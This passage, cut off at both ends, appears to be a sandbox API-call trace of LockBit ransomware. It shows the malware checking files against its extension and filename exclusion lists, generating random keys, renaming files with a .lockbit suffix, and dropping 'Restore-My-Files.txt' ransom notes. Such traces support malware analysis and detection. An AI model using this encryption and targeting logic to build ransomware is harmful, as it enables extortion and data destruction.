lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.312] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187881.WMF") returned 1 [0149.313] lstrcmpiW (lpString1="ntldr", lpString2="J0187881.WMF") returned 1 [0149.313] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187881.WMF") returned 1 [0149.313] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187881.WMF") returned -1 [0149.313] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187881.WMF") returned -1 [0149.313] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187881.WMF") returned 1 [0149.313] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187881.WMF") returned -1 [0149.313] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.313] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF") returned=".WMF" [0149.313] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.313] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.313] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.314] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.315] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.315] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.315] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF.lockbit") returned 72 [0149.315] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187881.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0149.316] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.316] malloc (_Size=0x40068) returned 0x3d70450 [0149.316] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4696) returned 1 [0149.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.317] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0149.317] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.317] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0149.317] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0149.323] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.323] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.323] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.324] free (_Block=0x1fa2ed8) [0149.324] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.324] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.324] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x834, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187883.WMF", cAlternateFileName="")) returned 1 [0149.329] lstrcmpiW (lpString1=".", lpString2="J0187883.WMF") returned -1 [0149.329] lstrcmpiW (lpString1="..", lpString2="J0187883.WMF") returned -1 [0149.329] PathFindExtensionW (pszPath="J0187883.WMF") returned=".WMF" [0149.329] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.329] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.329] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.329] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.329] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.329] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.330] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.331] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.331] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187883.WMF") returned 1 [0149.332] lstrcmpiW (lpString1="ntldr", lpString2="J0187883.WMF") returned 1 [0149.332] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187883.WMF") returned 1 [0149.332] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187883.WMF") returned -1 [0149.332] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187883.WMF") returned -1 [0149.332] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187883.WMF") returned 1 [0149.332] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187883.WMF") returned -1 [0149.332] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.332] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF") returned=".WMF" [0149.332] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.332] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.332] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.333] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.333] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF.lockbit") returned 72 [0149.333] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187883.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0149.334] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.335] malloc (_Size=0x40068) returned 0x3e70008 [0149.335] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2100) returned 1 [0149.335] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.335] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0149.335] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.336] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0149.336] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0149.433] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.433] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.433] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0149.434] free (_Block=0x1fa2ed8) [0149.434] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187883.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.468] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.468] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.468] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187893.WMF", cAlternateFileName="")) returned 1 [0149.468] lstrcmpiW (lpString1=".", lpString2="J0187893.WMF") returned -1 [0149.468] lstrcmpiW (lpString1="..", lpString2="J0187893.WMF") returned -1 [0149.469] PathFindExtensionW (pszPath="J0187893.WMF") returned=".WMF" [0149.469] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.469] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.470] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.470] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.500] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.500] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187893.WMF") returned 1 [0149.500] lstrcmpiW (lpString1="ntldr", lpString2="J0187893.WMF") returned 1 [0149.500] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187893.WMF") returned 1 [0149.500] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187893.WMF") returned -1 [0149.500] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187893.WMF") returned -1 [0149.500] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187893.WMF") returned 1 [0149.500] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187893.WMF") returned -1 [0149.500] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.500] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF") returned=".WMF" [0149.500] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.501] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.501] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.501] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.501] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.501] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.502] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.502] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF.lockbit") returned 72 [0149.503] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187893.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0149.504] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.504] malloc (_Size=0x40068) returned 0x3df0008 [0149.504] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5620) returned 1 [0149.504] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.505] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0149.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.505] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0149.565] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0149.567] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.567] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.567] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.583] free (_Block=0x1fa2ed8) [0149.583] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.583] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.583] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 